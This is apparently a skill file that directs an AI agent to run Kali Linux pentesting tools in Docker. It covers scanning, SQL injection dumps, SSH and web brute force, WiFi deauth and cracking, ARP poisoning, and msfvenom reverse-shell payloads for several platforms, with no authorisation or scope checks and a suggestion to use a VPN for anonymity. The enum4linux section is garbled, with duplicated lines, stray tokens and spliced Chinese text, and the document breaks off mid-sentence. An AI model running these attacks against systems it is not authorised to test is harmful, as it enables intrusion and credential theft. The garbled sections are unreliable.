# Kali Docker Pentesting Skill

## Overview

This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via `bash_tool`, making it 70% more token-efficient.
## 📁 DATA PERSISTENCE & OUTPUT LOGGING (CRITICAL)

### Volume Mount Structure

The container has two persistent volumes that sync with the host:

```
HOST                CONTAINER
./shared/     <---> /home/kaliuser/shared/
./wordlists/  <---> /home/kaliuser/wordlists/
```

### MANDATORY OUTPUT RULE

⚠️ CRITICAL: ALL scan results, outputs, and findings MUST be saved to `/home/kaliuser/shared/`

This ensures:
- ✅ Data persists after container restart
- ✅ Results are immediately available on host in `./shared/`
- ✅ Complete audit trail for all activities
- ✅ Easy access for reporting and analysis
### Output Organization Best Practices

#### 1. Use Timestamps in Filenames

```bash
# Generate timestamp
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

# Save with timestamp
docker exec kali nmap -sV 192.168.1.1 -oA /home/kaliuser/shared/nmap_scan_$TIMESTAMP
```

#### 2. Organize by Tool/Category

```bash
# Create organized directory structure
docker exec kali mkdir -p /home/kaliuser/shared/{nmap,gobuster,nikto,sqlmap,hydra,john,metasploit,wireless,forensics}

# Save to organized locations
docker exec kali nmap -sV target.com -oA /home/kaliuser/shared/nmap/scan_$(date +%Y%m%d_%H%M%S)
docker exec kali gobuster dir -u http://target.com -w /wordlist -o /home/kaliuser/shared/gobuster/target_$(date +%Y%m%d_%H%M%S).txt
```

#### 3. Standard Naming Convention

```
FORMAT: {tool}_{target}_{type}_{timestamp}.{ext}

EXAMPLES:
- nmap_192.168.1.1_full_20260125_143022.xml
- gobuster_example.com_dirs_20260125_143022.txt
- nikto_target.com_vuln_20260125_143022.txt
- hydra_ssh_192.168.1.10_20260125_143022.txt
- john_hashes_cracked_20260125_143022.txt
```

### Built-in Wordlists vs Custom Wordlists
#### Built-in Wordlists (Use Directly - No Mount Needed)

```bash
# Pre-installed wordlists in container:
/usr/share/wordlists/rockyou.txt       # Most popular passwords (needs extraction)
/usr/share/wordlists/dirb/common.txt   # Common directories
/usr/share/seclists/                   # Full SecLists collection
/usr/share/wordlists/metasploit/       # Metasploit wordlists

# Extract rockyou (one-time operation)
docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz

# Use built-in wordlists
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target
```

#### Custom Wordlists (Save to Volume)

```bash
# Generate custom wordlist and save to mounted volume
docker exec kali crunch 6 8 -o /home/kaliuser/wordlists/custom_6-8.txt
docker exec kali cewl http://target.com -w /home/kaliuser/wordlists/target_words.txt

# Custom wordlists appear in ./wordlists/ on host
```
### Complete Logging Examples

#### Network Scanning

```bash
# Create directory structure
docker exec kali mkdir -p /home/kaliuser/shared/recon/$(date +%Y%m%d)

# Host discovery with logging
docker exec kali bash -c 'nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/host_discovery_$(date +%H%M%S)'

# Port scan with logging
docker exec kali bash -c 'nmap -sV -p- 192.168.1.100 -oA /home/kaliuser/shared/recon/$(date +%Y%m%d)/port_scan_192.168.1.100_$(date +%H%M%S)'
```
#### Web Application Testing

```bash
# Create web assessment directory
docker exec kali mkdir -p /home/kaliuser/shared/web/target.com

# Directory enumeration
docker exec kali gobuster dir -u http://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -o /home/kaliuser/shared/web/target.com/gobuster_$(date +%Y%m%d_%H%M%S).txt

# Nikto scan
docker exec kali nikto -h http://target.com \
  -o /home/kaliuser/shared/web/target.com/nikto_$(date +%Y%m%d_%H%M%S).txt

# SQL injection testing
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch \
  --output-dir=/home/kaliuser/shared/web/target.com/sqlmap_$(date +%Y%m%d_%H%M%S)
```
#### Password Cracking

```bash
# Create password cracking directory
docker exec kali mkdir -p /home/kaliuser/shared/passwords

# John the Ripper with logging (redirect inside the container so the shared path resolves there)
docker exec kali bash -c 'john /home/kaliuser/shared/passwords/hashes.txt \
  --wordlist=/usr/share/wordlists/rockyou.txt \
  > /home/kaliuser/shared/passwords/john_output_$(date +%Y%m%d_%H%M%S).txt'

# Hydra brute force with logging
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  -o /home/kaliuser/shared/passwords/hydra_ssh_$(date +%Y%m%d_%H%M%S).txt \
  ssh://192.168.1.10
```
#### Wireless Attacks

```bash
# Create wireless directory
docker exec kali mkdir -p /home/kaliuser/shared/wireless

# Capture handshake
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \
  -w /home/kaliuser/shared/wireless/capture_$(date +%Y%m%d_%H%M%S) wlan0mon

# Crack WPA (run inside the container so the glob and tee see the container paths)
docker exec kali bash -c 'aircrack-ng -w /usr/share/wordlists/rockyou.txt \
  /home/kaliuser/shared/wireless/capture_*.cap \
  | tee /home/kaliuser/shared/wireless/crack_result_$(date +%Y%m%d_%H%M%S).txt'
```
#### Exploitation & Payloads

```bash
# Create payloads directory
docker exec kali mkdir -p /home/kaliuser/shared/payloads

# Generate payload and save to shared volume
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe \
  -o /home/kaliuser/shared/payloads/payload_$(date +%Y%m%d_%H%M%S).exe

# Metasploit resource file logging
docker exec kali bash -c 'echo "spool /home/kaliuser/shared/payloads/msf_session_$(date +%Y%m%d_%H%M%S).log" > /tmp/msf.rc'
```
### Accessing Results on Host

```bash
# View all saved results
ls -lh ./shared/

# View organized by date
tree ./shared/

# Search for specific scan (glob the tool name; an exact -name "nmap" would miss the timestamped files)
find ./shared/ -name "*nmap*" -type f

# Archive results
tar -czf pentest_results_$(date +%Y%m%d).tar.gz ./shared/
```
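The naming convention from "Standard Naming Convention" and the search step above, implemented as a small host-side shell helper. This is an added example, not part of the original skill; it assumes the host side of the mount is `./shared/` (override with `SHARED_ROOT`), and the function names are my own.

```bash
#!/usr/bin/env bash
# Added helper, not part of the original skill. Builds result paths that follow
# {tool}_{target}_{type}_{timestamp}.{ext} under the shared volume and finds
# earlier results by tool/target, so the audit trail stays searchable.
# SHARED_ROOT is the host side of the mount (./shared <-> /home/kaliuser/shared).
SHARED_ROOT="${SHARED_ROOT:-./shared}"

# sanitize_target: turn a URL, CIDR or host:port into something safe in a filename.
#   "http://target.com/"  -> "target.com"
#   "192.168.1.0/24"      -> "192.168.1.0_24"
sanitize_target() {
    local t="$1"
    t="${t#*://}"          # drop the scheme
    t="${t%/}"             # drop one trailing slash
    printf '%s' "$t" | tr -c 'A-Za-z0-9._-' '_'
}

# result_name TOOL TARGET TYPE EXT [TIMESTAMP]
# Prints the bare filename. TIMESTAMP defaults to now (YYYYmmdd_HHMMSS);
# pass it explicitly to reuse one stamp across several outputs of a run.
result_name() {
    local tool="$1" target="$2" type="$3" ext="$4"
    local ts="${5:-$(date +%Y%m%d_%H%M%S)}"
    printf '%s_%s_%s_%s.%s\n' "$tool" "$(sanitize_target "$target")" "$type" "$ts" "$ext"
}

# result_path: same arguments, but returns the full path inside the per-tool
# directory ($SHARED_ROOT/<tool>/), creating the directory if needed.
result_path() {
    local dir="$SHARED_ROOT/$1"
    mkdir -p "$dir"
    printf '%s/%s\n' "$dir" "$(result_name "$@")"
}

# container_path: translate a host-side result path into the path the
# container sees, for use as the tool's output argument in docker exec.
container_path() {
    printf '/home/kaliuser/shared/%s\n' "${1#"$SHARED_ROOT"/}"
}

# find_results TOOL [TARGET]: list saved results for a tool, optionally narrowed
# to one target, newest timestamp first. Because every file follows the
# convention, this works across all subdirectories of the shared volume.
find_results() {
    local tool="$1" target="${2:-}"
    local pattern="${tool}_*"
    if [ -n "$target" ]; then
        pattern="${tool}_$(sanitize_target "$target")_*"
    fi
    find "$SHARED_ROOT" -type f -name "$pattern" | sort -r
}

# Example run:
#   out=$(result_path nmap 192.168.1.0/24 full xml)
#   docker exec kali nmap -sV -oX "$(container_path "$out")" 192.168.1.0/24
#   find_results nmap 192.168.1.0/24
```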
### Quick Reference: Output Flags by Tool

```bash
# Nmap
-oN file.txt          # Normal output
-oX file.xml          # XML output
-oA basename          # All formats (recommended)

# Gobuster
-o file.txt           # Output to file

# Nikto
-o file.txt           # Output to file

# SQLmap
--output-dir=path     # Output directory

# Hydra
-o file.txt           # Output to file

# John
> file.txt            # Redirect stdout

# Aircrack-ng
-w /path/to/file      # Output file (for airodump-ng)

# Metasploit
spool file.log        # Log session to file
```

---
## Container Management

### Starting the Container

The container is managed via docker-compose with automatic volume mounting:

```bash
# Start with VPN (recommended for anonymized testing)
docker-compose up -d

# Start without VPN (direct connection)
docker-compose up -d kali

# Build from scratch
docker-compose build

# Check status
docker-compose ps
```

**Volume mounts are automatic:**
- `./shared/` → `/home/kaliuser/shared/` (all scan results & outputs)
- `./wordlists/` → `/home/kaliuser/wordlists/` (custom wordlists only)

### Running Commands
```bash
# Execute single command
docker exec kali [tool] [options]

# Interactive shell
docker exec -it kali /bin/bash

# Copy files out
docker cp kali:/home/kaliuser/shared/scan.txt ./output/

# Copy files in
docker cp ./wordlist.txt kali:/home/kaliuser/shared/
```
### Container Lifecycle

```bash
# Stop container
docker stop kali

# Start existing container
docker start kali

# Remove container
docker rm kali

# View logs
docker logs kali
```

---
## Tool Catalog

### 🔍 Network Discovery & Scanning

#### nmap - Network Mapper

**Description:** Industry-standard network scanner for host discovery, port scanning, and service detection.

**Usage:**
```bash
# Basic scan
docker exec kali nmap 192.168.1.1

# Service version detection
docker exec kali nmap -sV 192.168.1.1

# OS detection
docker exec kali nmap -O 192.168.1.1

# Comprehensive scan
docker exec kali nmap -sC -sV -O -p- 192.168.1.1

# Save results (ALWAYS use /home/kaliuser/shared/)
docker exec kali bash -c 'nmap -sV -oA /home/kaliuser/shared/nmap_scan_$(date +%Y%m%d_%H%M%S) 192.168.1.0/24'
```

**Common Options:**
- `-sS` - SYN stealth scan
- `-sT` - TCP connect scan
- `-sU` - UDP scan
- `-sV` - Version detection
- `-O` - OS detection
- `-A` - Aggressive scan (OS, version, scripts, traceroute)
- `-p-` - Scan all 65535 ports
- `-Pn` - Skip ping (assume host is up)
- `-T4` - Faster timing (0-5)
- `-oA` - Output all formats

#### masscan - Fast Port Scanner
**Description:** Extremely fast port scanner, can scan the entire internet in under 6 minutes.

**Usage:**
```bash
# Scan specific ports
docker exec kali masscan 192.168.1.0/24 -p80,443,8080

# Scan all ports fast
docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000

# Save results
docker exec kali masscan 10.0.0.0/8 -p80 -oL /home/kaliuser/shared/masscan.txt
```

#### netdiscover - Network Discovery
**Description:** Active/passive ARP reconnaissance tool.

**Usage:**
```bash
# Passive mode
docker exec kali netdiscover -p -i eth0

# Active mode with range
docker exec kali netdiscover -r 192.168.1.0/24
```

#### arp-scan - ARP Scanner
**Description:** Discovers IPv4 hosts using ARP.

**Usage:**
```bash
docker exec kali arp-scan --localnet
docker exec kali arp-scan 192.168.1.0/24
```

### 🌐 Web Application Testing
#### nikto - Web Server Scanner

**Description:** Web server vulnerability scanner.

**Usage:**
```bash
# Basic scan
docker exec kali nikto -h http://target.com

# SSL scan
docker exec kali nikto -h https://target.com -ssl

# Save results
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Tuning options
docker exec kali nikto -h http://target.com -Tuning 123bde
```

#### dirb - Directory Brute Forcer
**Description:** Web content scanner.

**Usage:**
```bash
# Default wordlist
docker exec kali dirb http://target.com

# Custom wordlist
docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt

# Save results
docker exec kali dirb http://target.com -o /home/kaliuser/shared/dirb.txt

# Extensions
docker exec kali dirb http://target.com -X .php,.html,.txt
```

#### gobuster - Directory/DNS Enumeration
**Description:** Fast directory and DNS enumeration tool.

**Usage:**
```bash
# Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# DNS subdomain enumeration
docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt

# Virtual host discovery
docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
```

#### wfuzz - Web Fuzzer
**Description:** Web application fuzzer.

**Usage:**
```bash
# Directory fuzzing
docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ

# Parameter fuzzing (quote the URL so the host shell does not treat "?" as a glob)
docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt "http://target.com/page?id=FUZZ"

# POST data fuzzing
docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
```

#### sqlmap - SQL Injection Tool
**Description:** Automatic SQL injection and database takeover tool.

**Usage:**
```bash
# Basic test
docker exec kali sqlmap -u "http://target.com/page?id=1"

# POST request
docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Enumerate databases
docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump

# Full automation
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
```

#### wpscan - WordPress Scanner
**Description:** WordPress vulnerability scanner.

**Usage:**
```bash
# Basic scan
docker exec kali wpscan --url http://target.com

# Enumerate users
docker exec kali wpscan --url http://target.com --enumerate u

# Enumerate plugins
docker exec kali wpscan --url http://target.com --enumerate p

# Aggressive scan
docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
```

#### whatweb - Website Fingerprinting
**Description:** Identifies websites and web technologies.

**Usage:**
```bash
# Basic scan
docker exec kali whatweb http://target.com

# Aggressive mode
docker exec kali whatweb -a 3 http://target.com

# Scan multiple URLs
docker exec kali whatweb -i /home/kaliuser/shared/urls.txt
```

---

### 🔐 Password Attacks

#### john - John the Ripper
**Description:** Fast password cracker.

**Usage:**
```bash
# Crack with default wordlist
docker exec kali john /home/kaliuser/shared/hashes.txt

# Use rockyou wordlist
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /home/kaliuser/shared/hashes.txt

# Crack specific format
docker exec kali john --format=raw-md5 /home/kaliuser/shared/hashes.txt

# Show cracked passwords
docker exec kali john --show /home/kaliuser/shared/hashes.txt

# Incremental mode
docker exec kali john --incremental /home/kaliuser/shared/hashes.txt
```

#### hashcat - Advanced Password Recovery
**Description:** World's fastest password cracker.

**Usage:**
```bash
# MD5 crack
docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256 crack
docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt

# Brute force (quote the mask so the host shell does not expand "?" as a glob)
docker exec kali hashcat -m 0 -a 3 hash.txt '?a?a?a?a?a?a'

# Show results
docker exec kali hashcat -m 0 hashes.txt --show
```

**Hash Modes:**
- 0 = MD5
- 100 = SHA1
- 1400 = SHA256
- 1700 = SHA512
- 1000 = NTLM
- 3200 = bcrypt

#### hydra - Network Password Cracker
**Description:** Fast network logon cracker.

**Usage:**
```bash
# SSH brute force
docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP POST form
docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# FTP brute force
docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# Multiple protocols
docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
```

#### medusa - Parallel Password Cracker
**Description:** Speedy, parallel, modular login brute-forcer.

**Usage:**
```bash
# SSH attack
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh

# HTTP basic auth
docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
```

#### crunch - Wordlist Generator
**Description:** Generates custom wordlists.

**Usage:**
```bash
# Generate 6-8 character wordlist
docker exec kali crunch 6 8 -o /home/kaliuser/shared/wordlist.txt

# Custom charset
docker exec kali crunch 4 6 0123456789 -o /home/kaliuser/shared/numbers.txt

# Pattern-based
docker exec kali crunch 8 8 -t pass@@@@ -o /home/kaliuser/shared/pattern.txt
```

---

### 📡 Wireless Security

#### aircrack-ng - WiFi Security Suite
**Description:** Complete suite for assessing WiFi network security.

**Usage:**
```bash
# Start monitor mode
docker exec kali airmon-ng start wlan0

# Capture packets
docker exec kali airodump-ng wlan0mon

# Capture specific network
docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kaliuser/shared/capture wlan0mon

# Deauth attack
docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kaliuser/shared/capture-01.cap
```

#### wifite - Automated Wireless Attack
**Description:** Automated wireless attack tool.

**Usage:**
```bash
# Automatic WPA attack
docker exec kali wifite --wpa

# All attack types
docker exec kali wifite

# Specific target
docker exec kali wifite -i wlan0 --kill
```

#### reaver - WPS Attack
**Description:** Brute force WPS PINs.

**Usage:**
```bash
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
```

### 🕵️ Information Gathering

#### theharvester - Email/Subdomain Harvester
**Description:** Gather emails, subdomains, IPs from public sources.

**Usage:**
```bash
# Search all sources
docker exec kali theharvester -d target.com -b all

# Specific source
docker exec kali theharvester -d target.com -b google

# Save results
docker exec kali theharvester -d target.com -b all -f /home/kaliuser/shared/harvest
```

#### dnsrecon - DNS Enumeration
**Description:** DNS enumeration and network reconnaissance.

**Usage:**
```bash
# Standard enumeration
docker exec kali dnsrecon -d target.com

# Zone transfer
docker exec kali dnsrecon -d target.com -a

# Brute force subdomains
docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
```

#### sublist3r - Subdomain Enumeration
**Description:** Fast subdomain enumeration using OSINT.

**Usage:**
```bash
# Basic enumeration
docker exec kali sublist3r -d target.com

# Enable brute force
docker exec kali sublist3r -d target.com -b

# Save results
docker exec kali sublist3r -d target.com -o /home/kaliuser/shared/subdomains.txt
```

#### enum4linux - SMB Enumeration
Description: Tool for enumerating information from Windows and Samba systems.
Usage:
bash
undefined说明: 用于枚举Windows和Samba系统信息的工具。
用法:
bash
undefinedFull enumeration
Full enumeration
docker exec kali enum4linux -a 192.168.1.1
docker exec kali enum4linux -a 192.168.1.1
User enumeration
User enumeration
docker exec kali enum4linux -U 192.168.1.1
docker exec kali enum4linux -U 192.168.1.1
Share enumeration
Share enumeration
docker exec kali enum4linux -S 192.168.1.1
undefineddocker exec kali enum4linux -S 192.168.1.1
### dmitry - Deep Information Gathering

**Description:** Deepmagic Information Gathering Tool.

**Usage:**
```bash
# Full scan (whois, netcraft, subdomains, e-mail addresses, port scan; -o writes the report)
docker exec kali dmitry -winsepo /home/kaliuser/shared/dmitry.txt target.com

# Subdomain search
docker exec kali dmitry -s target.com
```
---

## 🛡️ Exploitation Frameworks

### metasploit-framework - Penetration Testing Framework

**Description:** The world's most used penetration testing framework.

**Usage:**
```bash
# Start msfconsole (interactive; needs a TTY)
docker exec -it kali msfconsole

# Generate payload. Use -o so the file is written inside the container's shared
# volume; a shell redirect (> /home/kaliuser/shared/...) on the docker exec line
# is evaluated on the host, where that path normally does not exist.
docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /home/kaliuser/shared/payload.exe

# Search exploits non-interactively
docker exec kali msfconsole -q -x "search tomcat; exit"

# Run resource script
docker exec kali msfconsole -r /home/kaliuser/shared/script.rc
```

**Common msfvenom payloads:**
```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
```
### social-engineer-toolkit (SET)

**Description:** Social engineering penetration testing framework.

**Usage:**
```bash
# Start SET (interactive menu)
docker exec -it kali setoolkit
```
---

## 🔬 Forensics & Analysis

### binwalk - Firmware Analysis

**Description:** Analyze and extract firmware images.

**Usage:**
```bash
# Scan for embedded files
docker exec kali binwalk /home/kaliuser/shared/firmware.bin

# Extract files (-C puts the _firmware.bin.extracted directory on the shared
# volume instead of the container's working directory)
docker exec kali binwalk -e -C /home/kaliuser/shared/ /home/kaliuser/shared/firmware.bin

# Signature scan (the default scan type, spelled out)
docker exec kali binwalk --signature /home/kaliuser/shared/file.bin
```
### foremost - File Carving

**Description:** Recover files based on headers and footers.

**Usage:**
```bash
# Recover all file types
docker exec kali foremost -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered

# Specific file types. foremost refuses to write into an existing, non-empty
# directory, so give each run its own output directory (or add -T to timestamp it).
docker exec kali foremost -t jpg,png,pdf -i /home/kaliuser/shared/image.dd -o /home/kaliuser/shared/recovered_jpg_png_pdf
```
### volatility - Memory Forensics

**Description:** Advanced memory forensics framework.

**Usage:**
```bash
# These commands use Volatility 2 syntax (profile-based). If the image ships
# Volatility 3 (`vol`), plugins are named windows.info, windows.pslist, etc.
# and no --profile is needed.

# Get image info
docker exec kali volatility -f /home/kaliuser/shared/memory.dump imageinfo

# List processes
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 pslist

# Dump process
docker exec kali volatility -f /home/kaliuser/shared/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /home/kaliuser/shared/
```
### strings - Extract Strings

**Description:** Extract printable strings from files.

**Usage:**
```bash
# Basic extraction
docker exec kali strings /home/kaliuser/shared/binary > /home/kaliuser/shared/strings.txt

# Minimum length 10
docker exec kali strings -n 10 /home/kaliuser/shared/binary

# Unicode strings (16-bit little-endian, i.e. UTF-16LE as used by Windows binaries)
docker exec kali strings -e l /home/kaliuser/shared/binary
```
### exiftool - Metadata Extraction

**Description:** Read and write meta information in files.

**Usage:**
```bash
# View metadata
docker exec kali exiftool /home/kaliuser/shared/image.jpg

# Remove all metadata (exiftool keeps the original as image.jpg_original;
# add -overwrite_original to skip the backup)
docker exec kali exiftool -all= /home/kaliuser/shared/image.jpg

# Batch process. Pass the directory with -ext rather than a glob: an unquoted
# *.jpg on the docker exec line would be expanded by the host shell, not the container.
docker exec kali exiftool -ext jpg /home/kaliuser/shared/
```
---

## 🔄 Reverse Engineering

### ghidra - Software Reverse Engineering

**Description:** NSA's software reverse engineering framework.

**Usage:**
```bash
# GUI mode (requires X11 forwarding)
docker exec -it kali ghidra

# Headless mode: analyzeHeadless <project directory> <project name> -import <file>.
# Analysis results live in the project, so keep the project on the shared volume.
docker exec kali analyzeHeadless /home/kaliuser/shared/ghidra project -import /home/kaliuser/shared/binary.exe
```
### radare2 - Reverse Engineering Framework

**Description:** Advanced reverse engineering framework.

**Usage:**
```bash
# Open binary (interactive)
docker exec -it kali r2 /home/kaliuser/shared/binary

# Analyze non-interactively: analyse everything, print the entry function, quit (-q)
docker exec kali r2 -q -c 'aaa; pdf' /home/kaliuser/shared/binary

# Disassemble 10 instructions at the entry point and quit
docker exec kali r2 -q -c 'pd 10' /home/kaliuser/shared/binary
```
### gdb - GNU Debugger

**Description:** Standard debugger for Unix systems.

**Usage:**
```bash
# Debug binary
docker exec -it kali gdb /home/kaliuser/shared/binary

# Quiet start (no banner); PEDA or GEF load automatically if configured in ~/.gdbinit
docker exec -it kali gdb -q /home/kaliuser/shared/binary
```
---

## 🎯 Vulnerability Assessment

### lynis - Security Auditing

**Description:** Security auditing tool for Unix/Linux systems.

**Usage:**
```bash
# Full audit. lynis audits the system it runs on, i.e. the Kali container
# itself, not a remote target.
docker exec kali lynis audit system

# Quick scan (no prompts)
docker exec kali lynis audit system --quick
```
### nikto - Web Vulnerability Scanner

(See Web Application Testing section)
### openvas - Vulnerability Scanner

**Description:** Full-featured vulnerability scanner.

**Usage:**
```bash
# Start OpenVAS (requires initialization). On current Kali the scanner is
# packaged as GVM: run gvm-setup once, then gvm-start.
docker exec kali openvas-start
```
---

## 📊 Network Analysis

### tcpdump - Packet Capture

**Description:** Command-line packet analyzer.

**Usage:**
```bash
# Capturing needs NET_RAW/NET_ADMIN in the container (see Troubleshooting), and
# eth0 inside the container only sees the container's own traffic unless it was
# started with --network host.

# Capture on interface
docker exec kali tcpdump -i eth0

# Capture to file
docker exec kali tcpdump -i eth0 -w /home/kaliuser/shared/capture.pcap

# Read file
docker exec kali tcpdump -r /home/kaliuser/shared/capture.pcap

# Filter HTTP
docker exec kali tcpdump -i eth0 'tcp port 80'
```
### tshark - Network Protocol Analyzer

**Description:** Terminal-based Wireshark.

**Usage:**
```bash
# Capture packets
docker exec kali tshark -i eth0

# Capture to file
docker exec kali tshark -i eth0 -w /home/kaliuser/shared/capture.pcap

# Filter display
docker exec kali tshark -r /home/kaliuser/shared/capture.pcap -Y 'http.request'
```
### ettercap - Network Sniffer/Interceptor

**Description:** Comprehensive suite for MITM attacks.

**Usage:**
```bash
# Text mode (needs --network host plus NET_RAW/NET_ADMIN, see Troubleshooting)
docker exec -it kali ettercap -T -i eth0

# ARP poisoning: intercept traffic between the gateway and one victim
docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
```
---

## Common Pentesting Workflows

### 1. Network Reconnaissance

```bash
# Step 1: Discover live hosts
docker exec kali nmap -sn 192.168.1.0/24 -oA /home/kaliuser/shared/hosts

# Step 2: Port scan discovered hosts. -oA writes hosts.nmap/.gnmap/.xml, not
# hosts.txt, so first pull the live IPs out of the greppable file.
docker exec kali bash -c "awk '/Status: Up/ {print \$2}' /home/kaliuser/shared/hosts.gnmap > /home/kaliuser/shared/live.txt"
docker exec kali nmap -sV -p- -iL /home/kaliuser/shared/live.txt -oA /home/kaliuser/shared/ports

# Step 3: Enumerate services
docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /home/kaliuser/shared/services
```
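The same three steps as a reusable script, added here as an example and not part of the original skill. It assumes the container is named `kali` and the `./shared` ↔ `/home/kaliuser/shared` mount described above; the function names (`kali`, `extract_live_hosts`, `run_recon`) are this example's own. What it adds to the steps above is the glue: nmap's `-oA` writes `.gnmap`, not a target list, so the live IPs are parsed out of the greppable output before the port scan, and every command string is run through `bash -c` inside the container so paths, redirects and `$(...)` are resolved there rather than on the host.

```bash
#!/usr/bin/env bash
# Added example (not part of the original skill): the recon workflow above as
# functions. Assumes a container named "kali" with ./shared mounted at
# /home/kaliuser/shared; function names here are the example's own.

SHARED=/home/kaliuser/shared
KALI=${KALI_CONTAINER:-kali}

# Run one command line inside the container through bash, so globs, redirects
# and $(...) are expanded in the container rather than on the host.
kali() { docker exec "$KALI" bash -c "$*"; }

# Parse nmap greppable output (-oG, or the .gnmap file from -oA) on stdin and
# print each live IP once. A sweep line looks like:
#   Host: 192.168.1.10 ()  Status: Up
# Down hosts, "# Nmap ..." comment lines and "Ports:" lines are skipped.
extract_live_hosts() {
    awk '/^Host: / && /Status: Up/ { print $2 }' | sort -u
}

# Step 1: ping sweep, all three nmap formats kept on the shared volume
discover_hosts() {   # discover_hosts <cidr> <run_tag>
    kali "nmap -sn '$1' -oA '$SHARED/nmap/$2/hosts'"
}

# Step 2: build the target list from the sweep, then full-port scan only live hosts
port_scan_live() {   # port_scan_live <run_tag>
    kali "cat '$SHARED/nmap/$1/hosts.gnmap'" | extract_live_hosts \
        > "./shared/nmap/$1/live.txt"   # host side of the same volume
    kali "nmap -sV -p- -iL '$SHARED/nmap/$1/live.txt' -oA '$SHARED/nmap/$1/ports'"
}

# Step 3: default scripts plus version detection on the live hosts
enumerate_services() {   # enumerate_services <run_tag> <ports>
    kali "nmap -sC -sV -p '$2' -iL '$SHARED/nmap/$1/live.txt' -oA '$SHARED/nmap/$1/services'"
}

# Whole workflow, one timestamped directory per run, e.g.: run_recon 192.168.1.0/24
run_recon() {
    local tag
    tag=$(date +%Y%m%d_%H%M%S)
    kali "mkdir -p '$SHARED/nmap/$tag'"
    discover_hosts "$1" "$tag"
    port_scan_live "$tag"
    enumerate_services "$tag" 21,22,80,443
    echo "results: ./shared/nmap/$tag/"
}
```

`extract_live_hosts` is the only part that runs without Docker, which is why it is kept separate: it can be checked against a saved `.gnmap` file on the host before being trusted to feed `-iL`.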
### 2. Web Application Assessment

```bash
# Step 1: Identify web technologies
docker exec kali whatweb http://target.com

# Step 2: Directory enumeration
docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /home/kaliuser/shared/dirs.txt

# Step 3: Vulnerability scan
docker exec kali nikto -h http://target.com -o /home/kaliuser/shared/nikto.txt

# Step 4: Test for SQLi (--batch accepts sqlmap's defaults; --output-dir keeps
# its session and dump files on the shared volume instead of the container home)
docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --output-dir=/home/kaliuser/shared/sqlmap
```
### 3. Password Cracking Workflow

```bash
# Step 1: Generate wordlist. With -t the min and max lengths must both equal the
# pattern length (Pass@@@@ is 8 characters); each @ is replaced by a lowercase letter.
docker exec kali crunch 8 8 -t Pass@@@@ -o /home/kaliuser/shared/wordlist.txt

# Step 2: Crack hashes
docker exec kali john --wordlist=/home/kaliuser/shared/wordlist.txt /home/kaliuser/shared/hashes.txt

# Step 3: Network service brute force
docker exec kali hydra -L /home/kaliuser/shared/users.txt -P /home/kaliuser/shared/wordlist.txt ssh://192.168.1.1
```
### 4. Wireless Network Assessment

```bash
# The wireless adapter must be visible inside the container: start it with
